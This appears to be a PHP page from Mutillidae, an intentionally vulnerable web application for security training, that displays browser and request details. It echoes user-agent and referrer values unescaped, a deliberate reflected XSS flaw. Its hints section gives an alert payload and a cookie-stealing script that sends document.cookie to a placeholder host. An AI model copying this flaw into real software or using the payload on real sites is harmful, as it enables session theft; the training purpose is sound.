-
Notifications
You must be signed in to change notification settings - Fork 3
/
browser-info.php
executable file
·138 lines (106 loc) · 4.01 KB
/
browser-info.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
<center><h2><b>User agent string and other browser info</b></h2></center><p>
<B>Info obtained by PHP on the server:</B><P>
<TABLE cellpadding="5" width="65%" align="center">
<?php
table_print ("IP",$_SERVER['REMOTE_ADDR']);
$hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
table_print ("Hostname",gethostbyaddr($_SERVER['REMOTE_ADDR']));
table_print ("Operating System",find_os());
table_print ("Entire User Agent String",$_SERVER['HTTP_USER_AGENT']);
table_print ("Referrer",$_SERVER['HTTP_REFERER']);
table_print ("Remote Client Port:",$_SERVER['REMOTE_PORT']);
# table_print ("WhoIs info for your IP:", "<small><pre>".WhoIs($_SERVER['REMOTE_ADDR'])."</pre></small>");
echo $HTTP_COOKIE_VARS["TestCookie"];
function WhoIs($DomainName)
{ //This function by Andrew Pociu , small mods by Adrian Crenshaw
// Open a socket to geektools.com, one of the whois servers
$Socket = fsockopen("whois.arin.net", 43, $ErrorNum, $ErrorStr) or die("$errno: $errstr");
fputs($Socket, $DomainName."\n");
// Receive data from the whois server and put into a string
while(!feof($Socket))
{
$WhoIsString .= fgets($Socket, 2048);
}
// Close the stream and return the string
fclose($Socket);
return $WhoIsString;
}
?>
</TABLE>
<B>Info obtained by JavaScript on the client:</B><P>
<script language="javascript" type="text/javascript">
<!--
document.write('<TABLE cellpadding="5" width="65%" align="center">');
JSTable_print("Java Enabled",navigator.javaEnabled());
//JSTable_print("IP", java.net.InetAddress.getLocalHost().getHostAddress());
JSTable_print("Browser",navigator.appName);
JSTable_print("Browser Version",navigator.appVersion);
JSTable_print("Platform",navigator.platform);
JSTable_print("CPU Class",navigator.cpuClass);
var tp="";
if (navigator.appName=="Netscape"){
var tdes="Plugins";
for (i in navigator.plugins)
{
if (tp!=navigator.plugins[i].name){
JSTable_print(tdes,navigator.plugins[i].name);
tdes="";
}
tp=navigator.plugins[i].name;
}
}
JSTable_print("System Language",navigator.systemLanguage);
JSTable_print("Resolution",screen.width+"x"+screen.height);
JSTable_print("Color Depth",screen.colorDepth);
JSTable_print("Referrer",document.referrer);
JSTable_print("URL",unescape(document.location));
document.write("</TABLE>");
function JSTable_print(description,value)
{
document.write('<TR><TD><FONT color="#990099">' + description + '</FONT></TD><TD>' + value + '</TD></TR>');
}
// -->
</script>
<?php //PHP Functions
function table_print($description, $value){
echo '<TR><TD valign="top"><FONT color="#990099">'.$description.'</FONT></TD><TD>'.$value.'</TD></TR>';
}
function find_os()
{
$browserarray=explode("; ",$_SERVER['HTTP_USER_AGENT']);
$os= $browserarray[2];
return $os;
}
function find_browser()
{
$browserarray=explode("; ",$_SERVER['HTTP_USER_AGENT']);
if ($browserarray[1]=="U"){
$browser = $browserarray[4];
}else {
$browser = $browserarray[1];
}
return $browser;
}
?>
<?php
// Begin hints section
if ($_COOKIE["showhints"]==1) {
echo '<p><span style="background-color: #FFFF00">
<b>For XSS:</b>This implementation is purely a reflected XSS attack,
however it may show up in an admin\'s logs when they go to check out what
sort of browser their viewers are using. That should be a big hint for how
to attack this app. "<script>alert("XSS");</script>" is the classic, but
there are far more interesting things you could do which I plan show in a video later.
For some hot cookie stealing action, try something like:
<pre>
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
</script>
</pre>
Also, check out <a href="http://ha.ckers.org/xss.html">Rsnake\'s XSS Cheat Sheet</a>
for more ways you can encode XSS attacks that may allow you to get around some filters.
<br><br>
</span>';
}
// End hints section
?>